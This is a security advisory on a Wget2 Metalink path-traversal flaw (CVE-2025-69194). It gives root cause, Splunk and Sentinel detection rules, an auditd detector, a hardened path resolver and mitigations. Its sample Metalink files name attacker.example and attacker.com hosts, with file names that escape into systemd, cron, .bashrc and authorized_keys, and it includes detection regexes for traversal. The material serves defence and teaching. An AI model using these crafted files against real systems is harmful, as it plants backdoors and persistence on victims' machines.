Executive Summary
CVE-2025-69194 is a high-severity path traversal vulnerability in GNU Wget2 affecting Metalink (v3/v4) processing. The flaw allows a remote attacker to overwrite or create arbitrary files on the target system by abusing unsanitized file paths embedded inside Metalink XML metadata.
The vulnerability is particularly dangerous in automated environments (CI/CD, cron jobs, system provisioning scripts), where wget2 often runs unattended and may execute with elevated privileges.
Vulnerability Classification
| Category | Value |
|---|---|
| CVE ID | CVE-2025-69194 |
| CVSS Score | 8.8 |
| Severity | High |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | Required (or automated job) |
| Exploit Maturity | Functional |
| Impact Type | Arbitrary File Overwrite |
| Root Cause | Improper Path Validation |
Root Cause Analysis
Component Affected
- Metalink parser in GNU Wget2
- Affects both the .metalink (Metalink v3) and .meta4 (Metalink v4) formats
What Failed Internally
- The Metalink XML attribute <file name="..."> was used directly as the local output filename.
- No normalization or canonicalization was enforced.
- No validation against:
  - Relative traversal (../)
  - Absolute paths (/etc/passwd)
  - Encoded traversal (%2e%2e/), which matters wherever the name is percent-decoded before it reaches the filesystem; the kernel itself treats %2e%2e as a literal directory name
- No restriction to a sandboxed download directory.
Resulting Behavior
When parsing the Metalink:
- The resolved path is passed to filesystem write functions.
- The OS honors the path exactly as provided.
- Any file writable by the wget2 process can be:
  - Created
  - Overwritten
  - Truncated
Exploitation Flow
Step 1 – Attacker crafts Metalink XML
<?xml version="1.0" encoding="UTF-8"?>
<metalink xmlns="urn:ietf:params:xml:ns:metalink">
  <file name="../../.config/systemd/user/backdoor.service">
    <url location="us">http://attacker.com/payload</url>
  </file>
</metalink>
Step 2 – Victim executes wget2
wget2 --metalink malicious.meta4
Step 3 – Path traversal occurs
- The two ../ components climb out of the working directory, so the download location is bypassed
- For a working directory two levels below the home directory (e.g. ~/work/build), the file is written to:
~/.config/systemd/user/backdoor.service
Step 4 – Persistence / Impact
- File may later be executed
- System behavior altered
- Silent compromise possible
Realistic Impact Scenarios
User-Level Impact
- Shell startup file injection (.bashrc, .profile)
- SSH config manipulation
- Credential theft via altered configs
System-Level Impact (if elevated)
- Cron job injection
- Service override
- Denial of service
- Backdoor persistence
MITRE Mapping
CWE
- CWE-22 – Path Traversal
ATT&CK (Defensive Mapping)
| Technique | Description |
|---|---|
| T1204 | User-assisted execution |
| T1105 | Ingress tool transfer |
| T1546 | Event-triggered execution |
| T1499 | Service disruption |
Detection & Threat Hunting
What Makes This CVE Detectable
- Wget2 normally writes to predictable locations
- Metalink usage is uncommon in daily operations
- Writes to protected paths are high-signal events
Log Sources Required
| Platform | Log Source |
|---|---|
| Linux | auditd |
| EDR | Process + File telemetry |
| Network | Proxy / IDS |
| SIEM | File integrity monitoring |
| CI/CD | Job execution logs |
SPLUNK DETECTION RULES
1. Detect Wget2 Writing Outside Download Directories
index=os_logs
(process_name="wget2" OR process="wget2")
(syscall=creat OR syscall=open OR syscall=openat)
| where NOT like(file_path, "%/Downloads/%")
AND NOT like(file_path, "%/tmp/%")
AND NOT like(file_path, "%/var/tmp/%")
| stats count by host, user, file_path, process_name
Alert When:
wget2 writes to /etc, .config, /usr/local/bin, or shell startup files.
Note: the field names above (process_name, file_path) assume a normalizing add-on. In raw auditd the executable is exe= on the SYSCALL record and the file is name= on a separate PATH record that shares the event serial, and name= is frequently relative to the CWD record, so a raw-field version of this search must join those records and resolve the path before applying the directory exclusions.
2. Detect Metalink Downloads
index=proxy_logs
(http_response_content_type IN ("application/metalink4+xml", "application/metalink+xml")
OR uri_path IN ("*.meta4", "*.metalink"))
| stats count by src_ip, uri, user_agent
Enrichment: correlate with endpoint events within ±5 minutes.
3. Detect Encoded Path Traversal in Metalink Payloads
index=proxy_logs
| regex http_response_body="(?i)file\s+name=.*(\.\./|%2e%2e%2f|/etc/|/usr/)"
| stats count by src_ip, uri
Note: this rule only works where the proxy or IDS actually records response bodies, which most deployments do not. Where it does not, run the same pattern at the endpoint (file integrity monitoring on fetched .meta4/.metalink files) or in a content inspection pipeline. The (?i) flag covers upper-case percent-encoding such as %2E%2E%2F.
MICROSOFT SENTINEL (KQL) DETECTION
1. Wget2 Writing to Sensitive Paths
DeviceFileEvents
| where InitiatingProcessFileName == "wget2"
| where FolderPath has_any ("/etc/", "/usr/local/bin/", "/.config/", "/cron")
| project TimeGenerated, DeviceName, InitiatingProcessAccountName,
FolderPath, FileName, InitiatingProcessCommandLine
2. Metalink Network Activity
DeviceNetworkEvents
| where InitiatingProcessFileName == "wget2"
| where RemoteUrl endswith ".meta4" or RemoteUrl endswith ".metalink"
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP
3. Correlation Rule (High Confidence)
let metalinkDownloads =
    DeviceNetworkEvents
    | where InitiatingProcessFileName == "wget2"
    | where RemoteUrl endswith ".meta4" or RemoteUrl endswith ".metalink"
    | project DeviceName, MetalinkTime = TimeGenerated, RemoteUrl;
DeviceFileEvents
| where InitiatingProcessFileName == "wget2"
| where FolderPath has_any ("/etc/", "/.config/")
| join kind=inner metalinkDownloads on DeviceName
| where abs(datetime_diff('minute', TimeGenerated, MetalinkTime)) <= 5
| project TimeGenerated, DeviceName, InitiatingProcessAccountName, FolderPath, FileName, RemoteUrl, InitiatingProcessCommandLine
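The following Python is an added example, not code from this advisory or from the wget2 project. It runs the logic of Splunk rule 1 and Sentinel rule 1 (wget2 creating or opening files for writing outside its download locations) over raw auditd records, and it handles the two things the SIEM rules gloss over: the file name lives on a PATH record that must be joined to the SYSCALL and CWD records by event serial and resolved against the working directory, and read-only opens (wget2 legitimately reads the CA bundle under /etc) must be excluded by looking at the open flags. The log lines are constructed for the example and assume an audit rule of the form `-a always,exit -F arch=b64 -S open,openat,creat -F auid>=1000 -k file_write`; the allow-list and sensitive-path list are assumptions.

```python
"""Added example: wget2 write-outside-download-dir detection over auditd
records. Not from the advisory or the wget2 project. Log lines below are
constructed; field layout follows auditd SYSCALL/CWD/PATH records."""
import posixpath
import re
from collections import defaultdict

# x86_64 syscall numbers for the calls the Splunk rule names by symbol
SYSCALLS = {2: "open", 85: "creat", 257: "openat"}
O_WRONLY, O_RDWR, O_CREAT, O_TRUNC = 0x1, 0x2, 0x40, 0x200
WRITE_INTENT = O_WRONLY | O_RDWR | O_CREAT | O_TRUNC

# Assumed allow-list (the rule's Downloads/tmp exclusions) and high-signal paths
ALLOWED_DIRS = ("/home/ci/Downloads/", "/tmp/", "/var/tmp/")
SENSITIVE = ("/etc/", "/usr/local/bin/", "/.config/", "/cron",
             "/.bashrc", "/.profile", "/.ssh/")

MSG_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_audit(text):
    """Group records by event serial: {serial: {record_type: [fields, ...]}}.
    One syscall yields one SYSCALL, one CWD and one PATH record per path item,
    all carrying the same serial inside msg=audit(time:serial)."""
    events = defaultdict(lambda: defaultdict(list))
    for line in text.splitlines():
        m = MSG_RE.search(line)
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in KV_RE.findall(line)}
        fields["_time"] = float(m.group(1))
        events[int(m.group(2))][fields["type"]].append(fields)
    return events


def has_write_intent(sc):
    """creat always writes; open/openat carry flags in a1/a2 (hex in auditd)."""
    nr = int(sc["syscall"])
    if nr == 85:
        return True
    flags = int(sc["a2"] if nr == 257 else sc["a1"], 16)
    return bool(flags & WRITE_INTENT)


def resolve_path(cwd, name):
    """PATH name= is exactly what the process passed; relative names must be
    joined to the CWD record before a directory check means anything."""
    return posixpath.normpath(name if name.startswith("/") else posixpath.join(cwd, name))


def detect_wget2_writes(text, allowed_dirs=ALLOWED_DIRS, process="wget2"):
    """One alert per file wget2 created or opened for writing outside
    allowed_dirs. Other processes and read-only opens are ignored."""
    alerts = []
    for serial, recs in sorted(parse_audit(text).items()):
        sc = recs["SYSCALL"][0] if recs.get("SYSCALL") else None
        if sc is None or sc.get("comm") != process:
            continue
        if int(sc["syscall"]) not in SYSCALLS or sc.get("success") != "yes":
            continue
        if not has_write_intent(sc):
            continue
        cwd = recs["CWD"][0]["cwd"] if recs.get("CWD") else "/"
        for item in recs.get("PATH", []):
            if item.get("nametype") not in ("CREATE", "NORMAL"):  # skip PARENT dirs
                continue
            path = resolve_path(cwd, item["name"])
            if any(path.startswith(d) for d in allowed_dirs):
                continue
            alerts.append({"serial": serial, "time": sc["_time"], "uid": sc.get("uid"),
                           "syscall": SYSCALLS[int(sc["syscall"])], "path": path,
                           "severity": "high" if any(s in path for s in SENSITIVE) else "medium"})
    return alerts


# Constructed records: 9001 = traversal write, 9002 = benign download,
# 9003 = read-only open of the CA bundle, 9004 = a different process.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1733000000.101:9001): arch=c000003e syscall=257 success=yes exit=4 a0=ffffff9c a1=55d0c0a2b2a0 a2=241 a3=1b6 items=2 ppid=4100 pid=4101 auid=1000 uid=1000 comm="wget2" exe="/usr/bin/wget2" key="file_write"
type=CWD msg=audit(1733000000.101:9001): cwd="/home/ci/work/build"
type=PATH msg=audit(1733000000.101:9001): item=0 name="../../.config/systemd/user/" inode=1310 dev=08:01 mode=040755 nametype=PARENT
type=PATH msg=audit(1733000000.101:9001): item=1 name="../../.config/systemd/user/backdoor.service" inode=1344 dev=08:01 mode=0100644 nametype=CREATE
type=SYSCALL msg=audit(1733000000.102:9002): arch=c000003e syscall=257 success=yes exit=5 a0=ffffff9c a1=55d0c0a2b2a0 a2=241 a3=1b6 items=2 ppid=4100 pid=4101 auid=1000 uid=1000 comm="wget2" exe="/usr/bin/wget2" key="file_write"
type=CWD msg=audit(1733000000.102:9002): cwd="/home/ci/Downloads"
type=PATH msg=audit(1733000000.102:9002): item=1 name="tool.tar.gz" inode=1350 dev=08:01 mode=0100644 nametype=CREATE
type=SYSCALL msg=audit(1733000000.103:9003): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=55d0c0a2b2a0 a2=0 a3=0 items=1 ppid=4100 pid=4101 auid=1000 uid=1000 comm="wget2" exe="/usr/bin/wget2" key="file_write"
type=CWD msg=audit(1733000000.103:9003): cwd="/home/ci/Downloads"
type=PATH msg=audit(1733000000.103:9003): item=0 name="/etc/ssl/certs/ca-certificates.crt" inode=2000 dev=08:01 mode=0100644 nametype=NORMAL
type=SYSCALL msg=audit(1733000000.104:9004): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=55d0c0a2b2a0 a2=241 a3=1b6 items=2 ppid=900 pid=901 auid=1000 uid=1000 comm="vim" exe="/usr/bin/vim" key="file_write"
type=CWD msg=audit(1733000000.104:9004): cwd="/home/ci"
type=PATH msg=audit(1733000000.104:9004): item=1 name=".bashrc" inode=1200 dev=08:01 mode=0100644 nametype=NORMAL
"""

if __name__ == "__main__":
    for alert in detect_wget2_writes(SAMPLE_AUDIT_LOG):
        print(alert)
```

Only event 9001 produces an alert: the relative name on its PATH record resolves through the CWD record to ~/.config/systemd/user/backdoor.service, which is outside the allow-list and matches a sensitive prefix. Event 9003 is dropped because a2=0 means O_RDONLY, which is the check that keeps wget2's routine reads of /etc/ssl out of the alert stream.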
Severity Justification
- Low complexity
- Easily weaponized
- Silent exploitation possible
- High impact in automated environments
- Minimal forensic footprint if not monitored
Official Patch Information
Fixed Version
- GNU Wget2 2.2.1
Patch Behavior
- Normalizes file paths
- Rejects traversal sequences
- Forces output paths to remain within allowed directories
- Blocks absolute paths entirely
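The following Python is an added example, not wget2's code and not the upstream patch. It serves the Root Cause and Exploitation Flow sections as well as the Patch Behavior list above: it parses a Metalink v3 or v4 document, shows the verbatim join the advisory describes (an absolute name discards the download directory entirely, ../ climbs out of it), and beside it a hardened resolver that implements the four listed behaviours. The XML samples, directory names and the decision to percent-decode a name before validating it are assumptions made for illustration.

```python
"""Added example: Metalink <file name="..."> handling, the flawed verbatim
join beside a hardened resolver. Not wget2's code; samples are constructed."""
import posixpath
import urllib.parse
import xml.etree.ElementTree as ET  # for untrusted XML in production prefer defusedxml


class UnsafeMetalinkName(ValueError):
    """Raised when a <file name> would leave the download directory."""


def metalink_file_names(xml_text):
    """Return every <file name="..."> from a v3 (.metalink) or v4 (.meta4)
    document. Both nest <file> under a namespaced root, so the namespace is
    stripped from each tag before comparing."""
    names = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] == "file" and "name" in el.attrib:
            names.append(el.attrib["name"])
    return names


def unsafe_output_path(download_dir, name):
    """The flawed behaviour: the attribute is joined verbatim. normpath() here
    stands in for what the kernel does with '..' (symlinks ignored); an
    absolute name makes join() drop download_dir altogether."""
    return posixpath.normpath(posixpath.join(download_dir, name))


def safe_output_path(download_dir, name):
    """Hardened resolver: percent-decode first (assumption: a consumer that
    decodes names must validate the decoded form), reject absolute paths,
    reject any '..' component, then confirm the result stays under
    download_dir. Returns the confined path or raises UnsafeMetalinkName."""
    decoded = urllib.parse.unquote(name)
    if "\x00" in decoded:
        raise UnsafeMetalinkName("NUL byte in name: %r" % name)
    if decoded.startswith(("/", "\\")):
        raise UnsafeMetalinkName("absolute path rejected: %r" % name)
    if ".." in decoded.replace("\\", "/").split("/"):
        raise UnsafeMetalinkName("traversal sequence rejected: %r" % name)
    base = posixpath.normpath(download_dir)
    prefix = base.rstrip("/") + "/"
    resolved = posixpath.normpath(posixpath.join(base, decoded))
    if not resolved.startswith(prefix):  # also rejects "" and "." (the dir itself)
        raise UnsafeMetalinkName("escapes download directory: %r" % name)
    return resolved


def triage_metalink(xml_text, download_dir):
    """Map each declared name to ('ok', path) or ('rejected', reason)."""
    verdicts = {}
    for name in metalink_file_names(xml_text):
        try:
            verdicts[name] = ("ok", safe_output_path(download_dir, name))
        except UnsafeMetalinkName as exc:
            verdicts[name] = ("rejected", str(exc))
    return verdicts


# Constructed Metalink v4 document: the three traversal shapes the advisory
# lists plus one legitimate entry. Hosts are placeholders.
MALICIOUS_META4 = """<?xml version="1.0" encoding="UTF-8"?>
<metalink xmlns="urn:ietf:params:xml:ns:metalink">
  <file name="../../.config/systemd/user/backdoor.service">
    <url location="us">http://attacker.example/payload</url>
  </file>
  <file name="/etc/cron.d/evil"><url>http://attacker.example/cron</url></file>
  <file name="%2e%2e/%2e%2e/.bashrc"><url>http://attacker.example/rc</url></file>
  <file name="release/tool.tar.gz"><url>http://mirror.example/tool.tar.gz</url></file>
</metalink>
"""

# Constructed Metalink v3 document (different namespace, <files> wrapper).
LEGACY_METALINK = """<?xml version="1.0" encoding="UTF-8"?>
<metalink version="3.0" xmlns="http://www.metalinker.org/">
  <files>
    <file name="../.ssh/authorized_keys">
      <resources><url type="http">http://attacker.example/key</url></resources>
    </file>
  </files>
</metalink>
"""

if __name__ == "__main__":
    cwd = "/home/ci/work/build"  # assumed working directory two levels below $HOME
    for name in metalink_file_names(MALICIOUS_META4):
        print("%-48s unsafe   -> %s" % (name, unsafe_output_path(cwd, name)))
    for name, verdict in triage_metalink(MALICIOUS_META4, cwd).items():
        print("%-48s hardened -> %s" % (name, verdict))
    print(triage_metalink(LEGACY_METALINK, "/srv/dl"))
```

Two details are worth noting when running it. The verbatim join leaves `%2e%2e/%2e%2e/.bashrc` as a literal subdirectory, which is why the encoded form is only dangerous in a consumer that decodes names; the hardened resolver decodes before checking precisely so that it does not matter which path the name took. And the final prefix check is kept even though the `..` test already fires, because it is the one that survives future changes to the earlier checks and it also rejects an empty name or `.`, which would otherwise resolve to the download directory itself.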
Hardening & Mitigation
Immediate
- Upgrade to fixed version
- Disable Metalink if not required
Defensive Controls
- Run wget2 as unprivileged user
- Enforce file integrity monitoring
- Restrict outbound access for automation jobs
- Add SIEM alerts from rules above
Post-Incident Checklist
- Verify overwritten files
- Check cron, systemd user services
- Review .bashrc, .profile
- Rotate credentials if tampering suspected
- Rebuild system if persistence detected
Final Assessment
CVE-2025-69194 is not theoretical.
It is a clean, reliable file overwrite primitive that becomes critical when paired with automation or poor privilege separation.
Treat Metalink-based downloads as untrusted input. Patch immediately and monitor continuously.
